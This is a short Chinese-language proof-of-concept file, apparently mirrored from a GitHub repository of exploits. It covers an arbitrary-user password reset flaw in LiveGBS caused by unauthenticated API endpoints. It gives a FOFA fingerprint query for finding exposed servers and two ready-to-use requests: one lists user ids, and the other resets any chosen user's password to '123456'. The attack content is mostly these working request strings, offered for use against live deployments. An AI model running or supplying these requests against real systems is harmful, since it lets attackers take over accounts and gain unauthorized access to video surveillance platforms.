mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
33 lines
671 B
Markdown
33 lines
671 B
Markdown
# LiveGBS任意用户密码重置漏洞
|
||
|
||
LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码
|
||
|
||
## fofa
|
||
|
||
```yaml
|
||
icon_hash="-206100324"
|
||
```
|
||
|
||
## poc
|
||
|
||
### 获取用户id
|
||
|
||
```
|
||
/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc
|
||
```
|
||
|
||
|
||
|
||
### 通过id更改用户密码
|
||
|
||
```
|
||
/api/v1/user/resetpassword?id=22&password=123456
|
||
```
|
||
|
||
|
||
|
||
|
||
|
||
## 漏洞来源
|
||
|
||
- https://mp.weixin.qq.com/s/6To5_MA83i7rEfrxlqNpAQ |